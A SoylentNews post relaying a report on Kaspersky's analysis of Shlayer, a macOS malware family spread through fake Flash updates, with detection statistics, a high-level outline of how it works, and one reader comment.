Stories
Slash Boxes
Comments

SoylentNews is people

posted by martyb on Saturday January 25 2020, @06:53AM   Printer-friendly
from the Just-Works™ dept.

Mac users are getting bombarded by laughably unsophisticated malware:

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it's the number one threat encountered by users of Kaspersky Labs' antivirus programs for macOS.

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab's Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

An analysis Kaspersky Lab published on Thursday says that Shlayer is "a rather ordinary piece of malware" that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said "is basically the calling card of the entire family."

Another banal detail about Shlayer is its previously mentioned infected method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 2) by BsAtHome on Saturday January 25 2020, @09:29AM

    by BsAtHome (889) on Saturday January 25 2020, @09:29AM (#948421)

    Right so, the OS is not necessarily the primary factor. It is like the "Get rich quick" trap. Something too good to be true is only obvious to those who know how to think and refrain from too impulsive behaviour. That is, apparently, not an attribute shared by all people. You can also see it as the "Marshmallow experiment" in real life.

    Then again, there are some personality traits associated with users of different operating systems. The classic example, apple users get shown higher prices than others. How much more restraint apple users are, well, that would be up for debate.

    Starting Score:    1  point
    Karma-Bonus Modifier   +1  

    Total Score:   2